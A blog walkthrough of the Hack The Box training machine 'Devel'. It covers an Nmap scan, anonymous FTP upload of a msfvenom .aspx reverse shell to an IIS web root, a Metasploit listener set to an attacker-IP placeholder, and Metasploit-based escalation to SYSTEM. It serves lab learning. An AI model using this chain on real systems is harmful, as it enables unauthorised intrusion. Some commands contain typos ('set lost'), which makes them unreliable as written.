Hackthebox Devel Walkthrough
Hackthebox Devel Walkthrough
Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
- Let’s Spawn the machine
# Enumeration
- Let’s Start with the Nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/Desktop/HTB]
└─$ nmap -sC -sV -p- 10.10.10.5 --min-rate=1500
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 06:30 EDT
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.28 seconds
- there nothign much to explore its very straight forward machine …
Port 21
: Ftp Service
Port 80
: Microsoft_IIS server
- we are able to connect to the ftp server using the anonymous login
anonymous:anonymous
listing file the files revels that this is the directory for the IIS webserver , means the file we upload through the ftp server can be accessed through IIS server directory through root directory .
let’s generate
.aspx
reverse shell file using msfvenom
- we can upload this using
put
command through ftp server .
# Exploitation
- we can set the listner on the metasploit if we want using
1
2
3
4
5
use /multi/handler
set payload <payload>
set lost <attacker-IP>
set lport <listner port>
run
- and we can access our file , which we have upload on the server …
- as soon as we visit that file reverse shell will be triggered on our metasploit listner , and we got shell as
IIS APPPOOL\Web
similar towww-data
on linux…
- now we can background the process
( CTRL+Z )
and use the metasploit’s/multi/recon/local_exploit_suggestor
module by setting the session id where we have the meterpreter connection.
- as we run this module we will get the probable way to escaalte the privileges ..
- here we will use the
exploit/windows/local/ntusermndragover
module for privilege escalation by setting the session id and run it … after a little while , we will get the shell asNT AUTHORITY\SYSTEM
- now we can grab the
user.txt
file
- similarly we can get the root hash
1
2
3
4
5
6
7
8
9
Directory of C:\Users\Administrator\Desktop
14/01/2021 12:42 �� <DIR> .
14/01/2021 12:42 �� <DIR> ..
08/06/2025 01:28 �� 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5.027.282.944 bytes free
C:\Users\Administrator\Desktop>type root.txt
we can also go the manual way if we want …
# Final Thoughts
I hope this blog continues to be helpful in your learning journey!. If you find this blog helpful, I’d love to hear your thoughts — my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning!. You can contact me on Linkedin and Twitter
linkdin
Twitter